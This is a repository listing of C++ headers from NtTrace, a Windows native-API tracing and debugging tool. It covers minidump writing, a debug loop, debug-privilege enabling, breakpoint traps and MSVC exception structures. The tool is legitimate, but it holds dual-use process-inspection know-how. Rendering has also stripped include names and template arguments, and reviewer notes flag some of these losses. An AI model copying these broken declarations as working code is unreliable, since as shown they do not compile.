enumerates all types in a process. 
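*/
inline
BOOL DbgHelper::EnumTypes( ULONG64 BaseOfDll, PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback, PVOID UserContext ) const
{
    typedef
    BOOL
    IMAGEAPI
    SymEnumTypes(
        HANDLE hProcess,
        ULONG64 BaseOfDll,
        PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback,
        PVOID UserContext
        );

    // Resolved on first use from the dbgCopy module; stays null when the export is absent.
    DYN_LOAD( SymEnumTypes );

    BOOL bRet = false;

    if ( pfnSymEnumTypes )
    {
        bRet = pfnSymEnumTypes( m_hProcess, BaseOfDll, EnumSymbolsCallback, UserContext );
    }

    return bRet;
}

/**
 * Write a mini-dump of the process identified by processId to hFile.
 *
 * The process handle passed to MiniDumpWriteDump is m_hProcess (set by Initialise),
 * so processId is expected to identify that same process.
 *
 * @param processId        id of the process to dump
 * @param hFile            open, writable file handle that receives the dump
 * @param DumpType         MINIDUMP_TYPE flags selecting what is written
 * @param ExceptionParam   optional exception information (may be NULL)
 * @param UserStreamParam  optional user streams (may be NULL)
 * @param CallbackParam    optional callback information (may be NULL)
 * @return TRUE on success, FALSE if MiniDumpWriteDump is unavailable or fails
 *
 * Note: the dump can contain anything the target had in memory; callers should
 * restrict access to the output file accordingly.
 */
inline
BOOL DbgHelper::WriteMiniDump( DWORD processId, HANDLE hFile,
    MINIDUMP_TYPE DumpType,
    PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
    PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
    PMINIDUMP_CALLBACK_INFORMATION CallbackParam
    )
{
    typedef
    BOOL
    WINAPI
    MiniDumpWriteDump(
        IN HANDLE hProcess,
        IN DWORD ProcessId,
        IN HANDLE hFile,
        IN MINIDUMP_TYPE DumpType,
        IN CONST PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, OPTIONAL
        IN CONST PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, OPTIONAL
        IN CONST PMINIDUMP_CALLBACK_INFORMATION CallbackParam OPTIONAL
        );

    DYN_LOAD( MiniDumpWriteDump );

    BOOL bRet = FALSE;

    if ( pfnMiniDumpWriteDump )
    {
        bRet = pfnMiniDumpWriteDump( m_hProcess, processId, hFile, DumpType,
            ExceptionParam, UserStreamParam, CallbackParam );
    }
    return bRet;
}

// DYN_LOAD is a helper local to this header: undefine it here.
// (Previously spelt "#undef DYM_LOAD", which undefined nothing and left
// DYN_LOAD visible to every file including this header.)
#undef DYN_LOAD

/**
 * Test whether the EnumSymbols API is available.
 *
 * @return the result of a SymEnumSymbols call with no base, mask or callback,
 *         i.e. FALSE when the export could not be resolved.
 */
inline
BOOL DbgHelper::IsEnumSymbolsAvailable() const
{
    // Run a test which won't produce any callbacks
    return EnumSymbols( 0, 0, 0, 0 );
}

#endif // DBGHELP_6_1_APIS

}

#endif // DBGHELPER_INL_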
-------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/DebugDriver.h: -------------------------------------------------------------------------------- 1 | #ifndef DEBUGDRIVER_H_ 2 | #define DEBUGDRIVER_H_ 3 | 4 | /** 5 | @file 6 | Simple base class for running the debug loop. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2002,2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: DebugDriver.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #ifndef _WINDOWS_ 30 | #include 31 | #endif // _WINDOWS_ 32 | 33 | #include 34 | 35 | namespace or2 36 | { 37 | 38 | ////////////////////////////////////////////////////////////////////////// 39 | /** 40 | * Base interface class for writing a debugger. 41 | * 42 | * This class provides the callbacks for the DebugDriver class. 
43 | */ 44 | class Debugger 45 | { 46 | public: 47 | // callbacks on events 48 | /** Exception occurred */ 49 | virtual void OnException( HANDLE hProcess, HANDLE hThread, DWORD pid, DWORD tid, EXCEPTION_DEBUG_INFO const & DebugEvent, DWORD * pContinueExecution ) = 0; 50 | 51 | /** Callback on thread creation */ 52 | virtual void OnCreateThread( DWORD dwThreadId, CREATE_THREAD_DEBUG_INFO const & CreateThread ) = 0; 53 | 54 | /** Callback on process creation */ 55 | virtual void OnCreateProcess( DWORD dwProcessId, DWORD dwThreadId, CREATE_PROCESS_DEBUG_INFO const & CreateProcessInfo ) = 0; 56 | 57 | /** Callback on thread exit */ 58 | virtual void OnExitThread( DWORD dwThreadId, EXIT_THREAD_DEBUG_INFO const & ExitThread ) = 0; 59 | 60 | /** Callback on process exit */ 61 | virtual void OnExitProcess( DWORD dwProcessId, EXIT_PROCESS_DEBUG_INFO const & ExitProcess ) = 0; 62 | 63 | /** Callback on loading DLL */ 64 | virtual void OnLoadDll( HANDLE hProcess, LOAD_DLL_DEBUG_INFO const & LoadDll ) = 0; 65 | 66 | /** Callback on unloading DLL */ 67 | virtual void OnUnloadDll( UNLOAD_DLL_DEBUG_INFO const & UnloadDll ) = 0; 68 | 69 | /** Callback on outputting a debug string */ 70 | virtual void OnOutputDebugString( HANDLE hProcess, OUTPUT_DEBUG_STRING_INFO const & DebugString ) = 0; 71 | 72 | /** Is the debugger still active? 
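*/
    virtual bool Active() { return true; }

    /** Virtual dtor for safe inheritance */
    virtual ~Debugger() {}
};

//////////////////////////////////////////////////////////////////////////
/**
 * Adapter for stripped-down functionality of a Debugger.
 *
 * Every event callback is an empty default, so a concrete debugger derived
 * from this class only needs to override the events it is interested in.
 */
class DebuggerAdapter : public Debugger
{
#pragma warning( push )
#pragma warning( disable: 4100 ) // unreferenced formal parameter

public:
    // callbacks on events
    /** Exception occurred (the default leaves *pContinueExecution untouched) */
    virtual void OnException( HANDLE hProcess, HANDLE hThread, DWORD pid, DWORD tid, EXCEPTION_DEBUG_INFO const & DebugEvent, DWORD * pContinueExecution ) {}

    /** Callback on thread creation */
    virtual void OnCreateThread( DWORD dwThreadId, CREATE_THREAD_DEBUG_INFO const & CreateThread ) {}

    /** Callback on process creation */
    virtual void OnCreateProcess( DWORD dwProcessId, DWORD dwThreadId, CREATE_PROCESS_DEBUG_INFO const & CreateProcessInfo ) {}

    /** Callback on thread exit */
    virtual void OnExitThread( DWORD dwThreadId, EXIT_THREAD_DEBUG_INFO const & ExitThread ) {}

    /** Callback on process exit */
    virtual void OnExitProcess( DWORD dwProcessId, EXIT_PROCESS_DEBUG_INFO const & ExitProcess ) {}

    /** Callback on loading DLL */
    virtual void OnLoadDll( HANDLE hProcess, LOAD_DLL_DEBUG_INFO const & LoadDll ) {}

    /** Callback on unloading DLL */
    virtual void OnUnloadDll( UNLOAD_DLL_DEBUG_INFO const & UnloadDll ) {}

    /** Callback on outputting a debug string */
    virtual void OnOutputDebugString( HANDLE hProcess, OUTPUT_DEBUG_STRING_INFO const & DebugString ) {}

#pragma warning( pop )
};

//////////////////////////////////////////////////////////////////////////
/**
 * Simple class for running the debug loop.
 *
 * The DebugDriver class runs the debug loop until the debugee has finished.
 * Events are signified by callbacks to the supplied Debugger object
 */
class DebugDriver
{
public:
    /** Runs till debugee finishes, calling back 'debugger' for each event */
    void Loop( Debugger & debugger );

private:
    //////////////////////////////////////////////////////////////////////////
    // Data structure used for handling thread/process id -> handle mapping
    typedef std::map< DWORD, HANDLE > ThreadMap;
    struct ProcessEntry
    {
        // hProcess is initialised here so that an entry which is never
        // attached does not carry an indeterminate handle value.
        ProcessEntry() : attached( false ), hProcess( 0 ) {}
        bool attached;       // NOTE(review): presumably set once the process is attached -- confirm in the .cpp
        HANDLE hProcess;     // process handle, 0 until set
        ThreadMap threadMap; // thread id -> thread handle
    };
    typedef std::map< DWORD, ProcessEntry > ProcessMap;

private:
    ProcessMap processMap; // process id -> ProcessEntry
};

} // namespace

#endif // DEBUGDRIVER_H_
--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/DebugPriv.h:
--------------------------------------------------------------------------------
#ifndef DEBUG_PRIV_H_
#define DEBUG_PRIV_H_

/**
@file
Function to grant debug privileges to a process.

Granting debug privileges enables being able to access other processes
to read/write memory and debug them.

@author Roger Orr

Copyright © 2003.
This software is distributed in the hope that it will be useful, but
without WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Permission is granted to anyone to make or distribute verbatim
copies of this software provided that the copyright notice and
this permission notice are preserved, and that the distributor
grants the recipient permission for further distribution as permitted
by this notice.

Comments and suggestions are always welcome.
Please report bugs to rogero@howzatt.demon.co.uk.

$Revision: 1405 $
*/

// $Id: DebugPriv.h 1405 2013-11-12 23:57:17Z Roger $

#include "AdjustPriv.h"

namespace or2
{

/**
 * Enables the debug privilege (SE_DEBUG_NAME) for a process.
 *
 * With this privilege the process can open, read/write and debug other
 * processes (the reason the original comment said "so that kill works
 * properly"). It is a high-impact privilege: only the token of the process
 * that genuinely needs to debug should receive it.
 *
 * @param hProcess handle of the process to which to give debug privilege
 *                 (defaults to the current process)
 * @return
 * - TRUE - success
 * - FALSE - failure (EnableNamedPriv reports the error)
 */
BOOL
inline
EnableDebugPriv(
    HANDLE hProcess = GetCurrentProcess() ///< handle of the process to which to give debug privilege
    )
{
    return EnableNamedPriv( SE_DEBUG_NAME, hProcess );
}

}

#endif // DEBUG_PRIV_H_
--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/EntryPoint.h:
--------------------------------------------------------------------------------
#ifndef ENTRYPOINT_H_
#define ENTRYPOINT_H_

/**
@file
Manage a single entry point for NtTrace.

@author Roger Orr

Copyright © 2002,2007.
This software is distributed in the hope that it will be useful, but
without WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Permission is granted to anyone to make or distribute verbatim
copies of this software provided that the copyright notice and
this permission notice are preserved, and that the distributor
grants the recipient permission for further distribution as permitted
by this notice.

Comments and suggestions are always welcome.
Please report bugs to rogero@howzatt.demon.co.uk.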
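 $Revision: 1439 $
*/

// $Id: EntryPoint.h 1439 2014-10-07 23:24:07Z Roger $

// NOTE(review): the six #include directives below lost their header names when
// this listing was rendered. The declarations need the Windows types (HANDLE,
// DWORD, DWORD64, HMODULE, CONTEXT) plus std::string, std::map, std::set,
// std::vector and std::ostream/std::istream -- restore them from the original
// file rather than from this copy.
#include

#include
#include
#include
#include
#include

//////////////////////////////////////////////////////////////////////////
// Forward Reference
struct NtCall;

//////////////////////////////////////////////////////////////////////////
// Possible distinct argument types
typedef enum
{
    argULONG_PTR = 0, // also the default
    argULONG,
    argULONGLONG, // two adjacent dwords in 32bit, one qword in 64bit
    argENUM,
    argMASK,
    argBOOLEAN,
    argPOINTER,
    argPOBJECT_ATTRIBUTES,
    argPUNICODE_STRING,
    argPHANDLE,
    argPUSHORT,
    argPULONG,
    argACCESS_MASK,
    argPCLIENT_ID,
    argPIO_STATUS_BLOCK,
    argPLARGE_INTEGER,
    argPLPC_MESSAGE,
    argPFILE_BASIC_INFORMATION,
    argPFILE_NETWORK_OPEN_INFORMATION
} ArgType;

// Attribute flags of an argument (bit values, so they can be combined).
// Declared as a plain named enum: the earlier 'typedef enum ArgAttributes { ... };'
// had no typedef name, which standard C++ rejects (MSVC only warns).
enum ArgAttributes
{
    argNONE = 0,
    argIN = 1,
    argOUT = 2,
    argOPTIONAL = 4,
    argCONST = 8
};

/** One formal argument of a traced entry point */
struct Argument
{
    /** Default: a ULONG_PTR argument called "Unknown" with no attributes (dummy is initialised too) */
    Argument() : argType( argULONG_PTR ), argTypeName( "ULONG" ), name( "Unknown" ), attributes( argNONE ), dummy( false ) {}
    Argument( ArgType argType, std::string const &argTypeName, std::string const &name, ArgAttributes attributes )
        : argType( argType ), argTypeName( argTypeName ), name( name ), attributes( attributes ), dummy( false )
    {}

#ifdef _M_IX86
    typedef DWORD ARG;
#elif _M_X64
    typedef DWORD64 ARG;
#endif

    /**
     * Show the argument for the given process with the specified value.
     * @param os stream written to
     * @param hProcess process whose memory 'value' may point into
     * @param value raw argument value
     * @param returnOk NOTE(review): presumably whether the call succeeded -- confirm in the .cpp
     * @param dup NOTE(review): meaning not visible in this header -- confirm in the .cpp
     */
    void showArgument(std::ostream & os, HANDLE hProcess, ARG value, bool returnOk, bool dup) const;

    /** true if argument is output-only */
    bool outputOnly() const;

    ArgType argType; // Argument type for processing
    std::string argTypeName; // Actual argument type
    std::string name; // formal name of argument
    ArgAttributes attributes; // Optional attributes
    bool dummy; // True if this is a dummy argument (2nd part of 64bit item on 32bit Windows)
};

// Return type of a traced entry point (trailing comma removed: not valid before C++11)
typedef enum
{
    retNTSTATUS = 0, // also the default
    retVOID,
    retPVOID,
    retULONG,
    retULONG_PTR
} ReturnType;

/** A single traced native API entry point: its name, category, arguments and trap state */
class EntryPoint
{
public:
    typedef std::map Typedefs; // NOTE(review): template arguments lost in rendering -- restore from the original file

    /**
     * Construct from a name and a category; a category starting with '-'
     * marks the entry point as disabled and the marker is stripped.
     * An empty category is no longer indexed (category[0] on an empty
     * string was undefined behaviour before C++11).
     */
    explicit EntryPoint( std::string const & name, std::string const & category )
        : name( name ), category( category ),
          disabled( ! category.empty() && category[0] == '-' ),
          retType( retNTSTATUS ), targetAddress( 0 ), preSave( 0 ), ssn( 0 )
    {
        if ( disabled )
        {
            this->category.erase( 0, 1 ); // drop the leading '-' marker
        }
    }

    std::string const & getName() const { return name; }

    std::string const & getCategory() const { return category; }

    bool isDisabled() const { return disabled; }

    size_t getArgumentCount() const { return arguments.size(); }

    /** Resize the argument vector (new slots are default Argument objects) */
    void setArgumentCount( size_t newSize ) { arguments.resize( newSize ); }

    /** Access an argument; idx is not range checked */
    Argument const & getArgument( size_t idx ) const { return arguments[ idx ]; }

    /** Describe argument 'argNum' (defined out of line) */
    void setArgument( int argNum, std::string const & argType,
        std::string const & variableName, ArgAttributes attributes, Typedefs const & typedefs );

    void setDummyArgument(int argNum, ArgAttributes attributes);

    void setReturnType(std::string const &type, Typedefs const & typedefs);

    ReturnType getReturnType() const { return retType; }

    /** Read entry point definitions from 'cfgFile' into 'entryPoints' (defined out of line) */
    static bool readEntryPoints( std::istream & cfgFile, std::set & entryPoints, Typedefs & typedefs, // NOTE(review): template argument lost in rendering
        std::string & target );

    void writeExport( std::ostream & os ) const;

    /** Set a trap for this entry point in the target process */
    NtCall setNtTrap(HANDLE hProcess, HMODULE hTargetDll, bool bPreTrace, DWORD dllOffset);

    /** Clear the trap for this entry in the target process */
    bool clearNtTrap(HANDLE hProcess, NtCall const & ntcall) const;

    void setAddress( unsigned char *brkptAddress ) { targetAddress = brkptAddress; }

    unsigned char * getAddress() const { return targetAddress; }

    void setPreSave( unsigned char *preSaveAddress ) { preSave = preSaveAddress; }

    unsigned char * getPreSave() const { return preSave; }

    void doPreSave(HANDLE hProcess, HANDLE hThread, CONTEXT const & Context);

    /** Write a trace line for this entry point using the thread's context */
    void trace( std::ostream & os, HANDLE hProcess, HANDLE hThread, CONTEXT const & Context, bool bNames, bool bStackTrace, bool before ) const;

    /** Ordering used by the EntryPointSet */
    bool operator<( EntryPoint const & rhs ) const;

    static void stackTrace(std::ostream & os, HANDLE hProcess, HANDLE hThread);
private:
    std::string name; // name of entry point
    std::string category; // category of entry point
    bool disabled; // this entry point is disabled
    std::vector< Argument > arguments; // vector of arguments
    ReturnType retType; // Return type
    std::string retTypeName; // full name of return type
    unsigned char *targetAddress; // address the trap is set at, 0 until set
    unsigned char *preSave; // address of pre-save (for X64 fast-call)
    DWORD ssn; // System Service Number [Used to set Eax/Rax to pre-call breakpoint]; 0 until assigned

    NtCall insertBrkpt( HANDLE hProcess, unsigned char *address, unsigned int offset, unsigned char *setssn );
};

typedef std::set EntryPointSet; // NOTE(review): template argument lost in rendering -- restore from the original file

//////////////////////////////////////////////////////////////////////////
// Our data structure for an NT call
struct NtCall
{
    // All members are initialised so a default NtCall is a well-defined
    // 'no entry point, continue' record.
    NtCall() : entryPoint(0),
        nArgs(0), trapType(trapContinue), jumpTarget(0) {}

    EntryPoint* entryPoint; // Pointer into EntryPointMap

    size_t nArgs; // Number of arguments

    typedef enum
    {
        trapContinue,
        trapReturn,
        trapReturn0,
        trapJump
    } TrapType;
    TrapType trapType; // what to do when the trap is hit
    DWORD jumpTarget; // used for trapJump
};

#endif // ENTRYPOINT_H_
--------------------------------------------------------------------------------
/11_tools/NtTrace-x86/NtTrace/include/Enumerations.h:
--------------------------------------------------------------------------------
#ifndef ENUMERATIONS_H_
#define ENUMERATIONS_H_

/**
@file
Manage Nt enumerations for NtTrace.

@author Roger Orr

Copyright © 2011.
This software is distributed in the hope that it will be useful, but
without WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Permission is granted to anyone to make or distribute verbatim
copies of this software provided that the copyright notice and
this permission notice are preserved, and that the distributor
grants the recipient permission for further distribution as permitted
by this notice.

Comments and suggestions are always welcome.
Please report bugs to rogero@howzatt.demon.co.uk.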
23 | 24 | $Revision: 1460 $ 25 | */ 26 | 27 | // $Id: Enumerations.h 1460 2014-10-09 22:31:44Z Roger $ 28 | 29 | namespace Enumerations 30 | { 31 | /** Provide a single mapping from an enumeration value to a name */ 32 | struct EnumMap 33 | { 34 | unsigned long value; ///< The enumeration value 35 | char const * name; ///< The corresponding name 36 | }; 37 | 38 | /** Provide a mapping from an enumeration name to a zero-terminated array of EnumMap entries */ 39 | struct AllEnum 40 | { 41 | const char *name; ///< The enumeration name 42 | EnumMap *pMap; ///< The corresponding EnumMap 43 | }; 44 | 45 | extern AllEnum allEnums[]; 46 | } 47 | 48 | #endif // ENUMERATIONS_H_ 49 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/GetFileNameFromHandle.h: -------------------------------------------------------------------------------- 1 | #ifndef GetFileNameFromHandle_H_ 2 | #define GetFileNameFromHandle_H_ 3 | 4 | #include 5 | #include 6 | 7 | std::string GetFileNameFromHandle(HANDLE hFile); 8 | 9 | #endif // GetFileNameFromHandle_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/GetModuleBase.h: -------------------------------------------------------------------------------- 1 | #ifndef GETMODULEBASE_H_ 2 | #define GETMODULEBASE_H_ 3 | 4 | /**@file 5 | 6 | Function to provide an implementation of SymGetModuleBase. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: GetModuleBase.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #ifndef _WINDOWS_ 30 | #include 31 | #endif // _WINDOWS_ 32 | 33 | /** 34 | * GetModuleBase: try to get information about a module being loaded. 35 | * @param hProcess handle to the target process 36 | * @param dwAddress the target address 37 | * @return the base address of the module, or zero if not identified 38 | */ 39 | DWORD64 CALLBACK GetModuleBase( HANDLE hProcess, DWORD64 dwAddress ); 40 | 41 | /** 42 | * Get module file name, correcting for a couple of common issues. 43 | * 44 | * @param hProcess the process to query 45 | * @param hMod the module to query 46 | * @param szBuff the output filename buffer 47 | * @param bufLen the size of the output buffer 48 | * @returns the length of the string copied to the buffer, or zero on failure, 49 | * in which case call GetLastError for the underlying error code. 50 | */ 51 | DWORD GetModuleFileNameWrapper( HANDLE hProcess, HMODULE hMod, char * szBuff, DWORD bufLen ); 52 | 53 | #endif // GETMODULEBASE_H_ 54 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/MsvcExceptions.h: -------------------------------------------------------------------------------- 1 | #ifndef MSVCEXCEPTIONS_H_ 2 | #define MSVCEXCEPTIONS_H_ 3 | 4 | /**@file 5 | 6 | Data for Microsoft Visual Studio exceptions 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2004. 
11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: MsvcExceptions.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | /* Value of ExceptionCode for an MSVC C++ exception ("msc") */ 30 | static DWORD const MSVC_EXCEPTION = 0xe06d7363; 31 | 32 | /* Value of ExceptionCode for an MSVC notification exception (used for 'SetThreadName') */ 33 | static DWORD const MSVC_NOTIFICATION = 0x406d1388; 34 | 35 | /* Value of ExceptionCode for an MS CLR exception ("COM") */ 36 | static DWORD const CLR_EXCEPTION = 0xe0434f4d; 37 | 38 | /* Value of ExceptionCode for an MS CLR 4 exception ("CCR") */ 39 | static DWORD const CLR_EXCEPTION_V4 = 0xe0434352; 40 | 41 | /* Value of ExceptionCode for an MS CLR notification */ 42 | static DWORD const CLR_NOTIFICATION = 0x04242420; 43 | 44 | /** Value of ExceptionInformation[0] for an MSVC C++ exception */ 45 | static DWORD const MSVC_MAGIC_NUMBER1 = 0x19930520; // ' Name taken from EHSUP.INC (!) 46 | 47 | /* 48 | * Data passed about with a thrown object in MSVC. 49 | */ 50 | 51 | // Forward references 52 | struct MsvcClassHeader; 53 | struct MsvcClassInfo; 54 | 55 | /** 56 | * Data associated with a thrown object in MSVC 57 | * 58 | * ExceptionInformation[2] points to one of these, unless it is a no-arg throw 59 | * when the pointer is null. 
60 | */ 61 | struct MsvcThrow 62 | { 63 | DWORD unknown1; ///< Use is not known 64 | DWORD pDestructor; ///< Offset to destructor, or null 65 | DWORD unknown2; ///< Use is not known 66 | DWORD pClassHeader; ///< Offset to CTA2PAD (MsvcClassHeader) 67 | }; 68 | 69 | /** Class header for a thrown object in MSVC */ 70 | struct MsvcClassHeader 71 | { 72 | DWORD cInfo; ///< Count of Info structures 73 | DWORD Info[1]; ///< Actually variable size structure (MsvcClassInfo) 74 | }; 75 | 76 | /** Information pointed to by the class header for a thrown object in MSVC */ 77 | struct MsvcClassInfo 78 | { 79 | DWORD unknown1; ///< Flags? seen 0 and 4 80 | DWORD pTypeInfo; ///< Offset to type information (const type_info *) 81 | DWORD unknown2; ///< Usually zero 82 | DWORD unknown3; ///< Usually 0xffffffff, seen 4 83 | DWORD unknown4; ///< Only important if unknown3 != 0xffffffff 84 | DWORD size; ///< Size of object 85 | DWORD copyCtor; ///< Offset to copy constructor 86 | }; 87 | 88 | /* 89 | * Data structures used to implement catch handling and exception unwinding in MSVC 90 | */ 91 | 92 | // Forward references 93 | struct MsvcUnwindEntry; 94 | struct MsvcTryEntry; 95 | struct MsvcCatchEntry; 96 | 97 | /** 98 | * Top level catch handler in MSVC 99 | * 100 | * The compiler-generated Win32 exception handler starts with a mov into eax of 101 | * one of these structures. 
102 | */ 103 | struct MsvcFrameHandler 104 | { 105 | DWORD magic; ///< magic number (MSVC_MAGIC_NUMBER1) 106 | DWORD cUnwindEntry; ///< count of unwind entries 107 | MsvcUnwindEntry *pUnwindEntry; ///< unwind entries (indexed by 'current level' in exception record) 108 | DWORD cTryEntry; ///< count of try entries 109 | MsvcTryEntry *pTryEntry; ///< try entries (search in order by current level) 110 | }; 111 | 112 | /** Unwind entry in MSVC */ 113 | struct MsvcUnwindEntry 114 | { 115 | DWORD prev; ///< previous level for unwinding multiple variables 116 | PVOID unwindFunction; ///< function to unwind current variable 117 | }; 118 | 119 | /** Try entry in MSVC */ 120 | struct MsvcTryEntry 121 | { 122 | DWORD startIndex; ///< Level at start of try block 123 | DWORD endIndex; ///< Level at end of try block 124 | DWORD catchIndex; ///< Level after catch statement(s) 125 | DWORD nCatchEntry; ///< Number of catch statements 126 | MsvcCatchEntry *pCatchEntry; ///< Pointer to catch entries 127 | }; 128 | 129 | /** Data for an individual catch handler in MSVC */ 130 | struct MsvcCatchEntry 131 | { 132 | DWORD flags; ///< flags describing sort of catch 133 | DWORD rtti; ///< pointer to RTTI information 134 | DWORD offset; ///< stack offset (?) 135 | PVOID catchHandler; ///< start of catch block 136 | }; 137 | 138 | #endif // MSVCEXCEPTIONS_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/NtDllStruct.h: -------------------------------------------------------------------------------- 1 | #ifndef NtDllStruct_H_ 2 | #define NtDllStruct_H_ 3 | 4 | /**@file 5 | 6 | Header for NtDll Structures - defines some data structures used by the native API. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2004. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: NtDllStruct.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | // For MSVC 5.00/6.00 basetsd.h (changes with platform SDK) 30 | #ifndef _W64 31 | typedef UINT_PTR ULONG_PTR; 32 | typedef ULONG SIZE_T; 33 | #endif 34 | 35 | // Nt services data structures 36 | 37 | /** Status codes returned from the Native API */ 38 | typedef LONG NTSTATUS; 39 | 40 | /** Testing for success */ 41 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 42 | 43 | /** Unicode String used in Native API */ 44 | typedef struct _UNICODE_STRING { 45 | USHORT Length; ///< Length of string in bytes 46 | USHORT MaximumLength; ///< Maximum length of Buffer 47 | PWSTR Buffer; ///< Pointer to Unicode string 48 | } UNICODE_STRING, *PUNICODE_STRING; 49 | 50 | /** Object Attributes used in Native API */ 51 | typedef struct _OBJECT_ATTRIBUTES { 52 | ULONG Length; ///< Length of the structure 53 | HANDLE RootDirectory; ///< Handle to the root object directory or NULL 54 | PUNICODE_STRING ObjectName; ///< Name of the object 55 | ULONG Attributes; ///< Attributes for the object 56 | PVOID SecurityDescriptor; ///< Security descriptor, or NULL 57 | PVOID SecurityQualityOfService; ///< Quality of service 58 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 59 | 60 | /** Client ID used in Native API */ 61 | typedef struct _CLIENT_ID { 62 | HANDLE UniqueProcess; ///< Process ID 63 | HANDLE UniqueThread; ///< Thread ID 64 | } CLIENT_ID, *PCLIENT_ID; 65 | 66 | /** I/O status block used in Native API */ 67 | typedef struct _IO_STATUS_BLOCK { 68 | union { 69 | 
NTSTATUS Status; ///< NT status value 70 | PVOID Pointer; ///< Pointer 71 | }; 72 | 73 | ULONG_PTR Information; ///< Additional information 74 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 75 | 76 | /** Basic File Information used in Native API */ 77 | typedef struct _FILE_BASIC_INFORMATION { 78 | LARGE_INTEGER CreationTime; ///< Time of creation 79 | LARGE_INTEGER LastAccessTime; ///< Time of last access 80 | LARGE_INTEGER LastWriteTime; ///< Time of last write 81 | LARGE_INTEGER ChangeTime; ///< Time of last change 82 | ULONG FileAttributes; ///< File attributes 83 | } FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; 84 | 85 | /** Network Open Information used in Native API */ 86 | typedef struct _FILE_NETWORK_OPEN_INFORMATION { 87 | LARGE_INTEGER CreationTime; ///< Time of creation 88 | LARGE_INTEGER LastAccessTime; ///< Time of last access 89 | LARGE_INTEGER LastWriteTime; ///< Time of last write 90 | LARGE_INTEGER ChangeTime; ///< Time of last change 91 | LARGE_INTEGER AllocationSize; ///< Size of file allocation 92 | LARGE_INTEGER EndOfFile; ///< End of file position 93 | ULONG FileAttributes; ///< File attributes 94 | } FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; 95 | 96 | /** Object returned from NtQueryDirectoryObject */ 97 | typedef struct _OBJECT_DIRECTORY_INFORMATION { 98 | UNICODE_STRING Name; ///< Name of directory object 99 | UNICODE_STRING TypeName; ///< Type of directory object, eg "Section" 100 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; 101 | 102 | /** LPC message structure */ 103 | typedef struct _LPC_MESSAGE { 104 | USHORT DataLength; ///< Data length 105 | USHORT Length; ///< Length of message, including this header 106 | USHORT MessageType; ///< LPC_TYPE 107 | USHORT DataInfoOffset; ///< Offset to data information 108 | CLIENT_ID ClientId; ///< Client ID 109 | ULONG_PTR MessageId; ///< Message identifier (incrementing counter) 110 | ULONG_PTR CallbackId; ///< Callback identifier 111 | } LPC_MESSAGE, 
